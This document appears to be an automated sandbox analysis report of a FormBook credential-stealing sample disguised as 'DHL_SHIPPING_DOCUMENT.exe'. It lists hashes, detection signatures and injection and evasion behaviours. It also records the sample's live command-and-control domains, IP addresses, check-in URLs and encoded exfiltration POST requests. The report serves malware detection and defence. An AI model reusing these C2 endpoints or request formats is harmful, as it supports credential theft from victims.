Windows Analysis Report
DHL_SHIPPING_DOCUMENT.exe

Overview

General Information

Sample Name: DHL_SHIPPING_DOCUMENT.exe
Analysis ID: 830431
MD5: 04f5c33c1d3f795872b58f8c3922b49e
SHA1: 3db181379815210d6fb0491d9660ddefff263224
SHA256: c0fee78265aef8793cb49690cc68fdf3debb84ab529bd59a2883a0c63ee0a6f5
Tags: DHLexeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: DHL_SHIPPING_DOCUMENT.exe ReversingLabs: Detection: 25%
Source: DHL_SHIPPING_DOCUMENT.exe Virustotal: Detection: 39% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== Avira URL Cloud: Label: malware
Source: http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== Avira URL Cloud: Label: malware
Source: http://www.363ww.top/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.sowmedia.site Avira URL Cloud: Label: malware
Source: http://www.on-smooth.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.luxgudonu.store/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.sowmedia.site/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.rw-bau.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.worldhortihealth.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.espisys-technology.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.getpay.life Avira URL Cloud: Label: malware
Source: http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.motherhoodinthegarden.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.versicherungsgott.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.yh78898.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v Avira URL Cloud: Label: malware
Source: http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== Avira URL Cloud: Label: malware
Source: http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== Avira URL Cloud: Label: malware
Source: http://www.getpay.life/d2a3/ Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.eixfhzlwqd.exe.20a0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 50.87.195.203 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 37.97.254.29 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.getpay.life
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.luxgudonu.store
Source: C:\Windows\explorer.exe Domain query: www.motherhoodinthegarden.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.32 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.28.110 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sowmedia.site
Source: C:\Windows\explorer.exe Domain query: www.363ww.top
Source: C:\Windows\explorer.exe Domain query: www.espisys-technology.com
Source: C:\Windows\explorer.exe Domain query: www.on-smooth.com
Source: C:\Windows\explorer.exe Domain query: www.yh78898.com
Source: C:\Windows\explorer.exe Domain query: www.versicherungsgott.com
Source: C:\Windows\explorer.exe Network Connect: 104.233.254.113 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.88 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 113.52.135.193 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:60686 -> 8.8.8.8:53
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1Host: www.versicherungsgott.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1Host: www.getpay.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1Host: www.espisys-technology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1Host: www.on-smooth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1Host: www.luxgudonu.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1Host: www.sowmedia.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1Host: www.yh78898.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.97.254.29 37.97.254.29
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.motherhoodinthegarden.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.motherhoodinthegarden.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.getpay.lifeConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.getpay.lifeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getpay.life/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 59 53 7e 70 65 44 58 45 52 32 41 4a 75 4b 79 6c 6f 61 34 46 4b 63 36 66 62 59 6a 65 76 54 76 39 30 65 44 47 65 57 35 53 31 54 34 38 7a 48 34 74 35 70 44 6d 76 32 66 63 50 43 4f 51 59 35 50 72 66 76 37 76 5a 41 39 51 79 43 50 51 6a 58 64 6d 4b 48 43 42 67 2d 76 4a 55 64 50 68 6e 56 36 4e 79 68 45 4a 6a 54 6f 41 6f 7a 4f 72 6a 65 4a 52 54 33 78 70 28 52 37 4e 6f 2d 4d 53 47 57 33 64 69 6f 43 62 53 5a 37 69 52 7a 7a 50 63 56 41 6d 66 68 42 39 43 77 73 74 76 76 64 6e 4c 50 62 78 32 52 33 49 31 47 69 67 75 4a 59 76 36 74 42 73 63 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=YS~peDXER2AJuKyloa4FKc6fbYjevTv90eDGeW5S1T48zH4t5pDmv2fcPCOQY5Prfv7vZA9QyCPQjXdmKHCBg-vJUdPhnV6NyhEJjToAozOrjeJRT3xp(R7No-MSGW3dioCbSZ7iRzzPcVAmfhB9CwstvvdnLPbx2R3I1GiguJYv6tBscg).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.espisys-technology.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.espisys-technology.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.espisys-technology.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 4b 54 46 63 75 44 4e 65 36 42 4a 62 39 74 7e 33 75 72 4f 55 37 33 69 76 66 52 43 4d 6b 52 33 33 59 65 33 41 76 32 6e 45 7a 62 37 42 51 6e 59 69 62 31 4a 4f 65 6c 73 78 53 33 67 65 65 2d 7a 6b 56 48 68 32 64 44 57 77 50 6f 44 58 56 51 36 31 47 36 68 35 4d 76 74 61 6c 37 46 72 34 44 74 68 46 71 75 65 65 72 69 34 65 71 64 35 4f 35 6d 58 79 69 4a 34 66 66 61 4c 79 71 42 56 6c 6a 28 63 55 4b 6e 74 7a 42 47 4a 4d 64 54 47 7e 34 56 67 7e 4d 79 50 38 48 31 32 47 36 35 63 52 6f 58 30 73 5f 5a 6f 61 34 69 6d 52 39 64 5f 37 6c 58 72 6f 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=KTFcuDNe6BJb9t~3urOU73ivfRCMkR33Ye3Av2nEzb7BQnYib1JOelsxS3gee-zkVHh2dDWwPoDXVQ61G6h5Mvtal7Fr4DthFqueeri4eqd5O5mXyiJ4ffaLyqBVlj(cUKntzBGJMdTG~4Vg~MyP8H12G65cRoX0s_Zoa4imR9d_7lXrog).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.on-smooth.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.on-smooth.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.on-smooth.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 47 6c 70 61 49 4f 35 48 43 67 37 6e 71 45 7e 55 4c 72 45 79 44 68 53 6d 43 36 5a 70 6c 6f 4d 5a 52 67 5a 6d 4d 37 6b 6e 44 70 4f 37 28 56 4f 57 4c 53 37 6c 53 42 74 6c 49 51 65 33 62 33 62 65 6e 66 4b 50 52 67 64 68 6f 64 43 75 37 64 6e 57 68 30 33 35 4a 61 36 57 41 2d 72 72 59 52 6d 7a 51 72 4a 42 78 38 61 48 41 57 6f 41 64 48 65 4b 34 59 42 54 39 31 48 36 64 77 44 33 4c 4a 58 45 39 31 49 75 79 39 61 63 5a 63 28 48 4d 6f 74 79 51 43 74 38 45 6b 6a 6c 4f 56 67 71 37 48 6e 7a 53 4a 67 4b 56 78 41 77 57 5a 6b 42 6c 32 6d 54 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=GlpaIO5HCg7nqE~ULrEyDhSmC6ZploMZRgZmM7knDpO7(VOWLS7lSBtlIQe3b3benfKPRgdhodCu7dnWh035Ja6WA-rrYRmzQrJBx8aHAWoAdHeK4YBT91H6dwD3LJXE91Iuy9acZc(HMotyQCt8EkjlOVgq7HnzSJgKVxAwWZkBl2mTaA).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.luxgudonu.storeConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.luxgudonu.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.luxgudonu.store/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 44 68 6d 66 6b 65 57 38 47 51 4d 49 36 59 72 75 31 79 4a 4a 6d 31 62 51 73 37 73 4f 61 65 44 4b 6a 63 48 70 7a 64 79 6d 54 36 31 35 62 6e 41 32 46 4b 61 2d 53 6e 54 68 6e 39 4d 6b 73 50 4c 48 77 4b 71 54 6a 63 42 51 51 4c 4b 33 43 47 6a 58 78 77 50 71 6b 73 4a 5f 4f 66 7a 37 66 65 48 76 6c 32 52 7a 66 5a 74 33 6f 4f 76 76 63 67 47 37 75 6a 62 48 30 69 4e 6e 64 67 6c 73 55 51 52 32 7a 43 31 43 53 67 75 77 62 33 6c 2d 44 55 54 56 50 30 49 6f 28 57 6b 53 58 6a 68 56 54 67 41 67 37 35 57 71 30 69 4b 31 64 4b 31 6d 55 6f 39 53 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=DhmfkeW8GQMI6Yru1yJJm1bQs7sOaeDKjcHpzdymT615bnA2FKa-SnThn9MksPLHwKqTjcBQQLK3CGjXxwPqksJ_Ofz7feHvl2RzfZt3oOvvcgG7ujbH0iNndglsUQR2zC1CSguwb3l-DUTVP0Io(WkSXjhVTgAg75Wq0iK1dK1mUo9ScA).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.sowmedia.siteConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.sowmedia.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sowmedia.site/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 6f 4b 41 2d 67 6c 70 52 43 31 42 37 39 34 74 4f 61 4c 7e 36 64 4f 37 65 77 2d 49 43 4f 30 7a 61 6b 6b 45 4d 66 38 65 72 61 64 74 48 34 78 4b 49 31 47 30 70 64 52 64 41 35 62 72 73 4a 4b 69 6a 6b 4f 65 45 50 4e 4d 42 39 64 67 63 4d 48 31 73 53 45 73 71 44 78 69 58 31 43 73 4f 39 56 58 69 59 6f 73 31 77 53 6a 50 28 77 59 51 6b 5f 4d 46 72 63 6c 6d 53 50 38 6e 62 42 46 50 57 4c 41 48 77 63 62 70 7a 49 34 75 28 62 79 5a 34 2d 7e 67 52 6a 4a 33 35 36 50 5f 61 33 75 45 65 56 48 38 48 64 52 6b 78 56 56 76 73 4a 55 49 6d 52 73 63 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=oKA-glpRC1B794tOaL~6dO7ew-ICO0zakkEMf8eradtH4xKI1G0pdRdA5brsJKijkOeEPNMB9dgcMH1sSEsqDxiX1CsO9VXiYos1wSjP(wYQk_MFrclmSP8nbBFPWLAHwcbpzI4u(byZ4-~gRjJ356P_a3uEeVH8HdRkxVVvsJUImRscAg).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.yh78898.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.yh78898.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yh78898.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 79 70 50 62 75 6e 38 75 61 52 5a 32 59 74 32 46 6f 6f 73 78 71 5f 57 39 57 52 34 42 54 39 61 72 56 43 28 5f 64 72 77 75 65 2d 51 34 53 31 42 46 34 36 66 7a 75 44 30 37 50 4b 72 6d 58 4f 49 6b 43 30 77 31 47 52 6f 7a 4e 53 31 6a 37 6a 57 42 28 31 38 79 33 36 70 42 44 6d 7e 71 6a 5f 4b 37 45 30 39 4d 74 50 44 74 6d 69 6c 7a 62 41 6c 55 68 35 47 6d 6c 42 33 63 54 43 48 59 76 75 43 73 6e 57 55 52 70 41 64 35 61 4a 65 7a 73 33 74 42 56 70 50 38 4f 35 61 4a 61 59 35 4c 6a 68 55 39 6f 6c 76 79 70 43 65 5f 66 59 4e 43 57 32 54 65 38 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=ypPbun8uaRZ2Yt2Foosxq_W9WR4BT9arVC(_drwue-Q4S1BF46fzuD07PKrmXOIkC0w1GRozNS1j7jWB(18y36pBDm~qj_K7E09MtPDtmilzbAlUh5GmlB3cTCHYvuCsnWURpAd5aJezs3tBVpP8O5aJaY5LjhU9olvypCe_fYNCW2Te8A).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:27:41 GMTServer: Apache/2.4.56 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
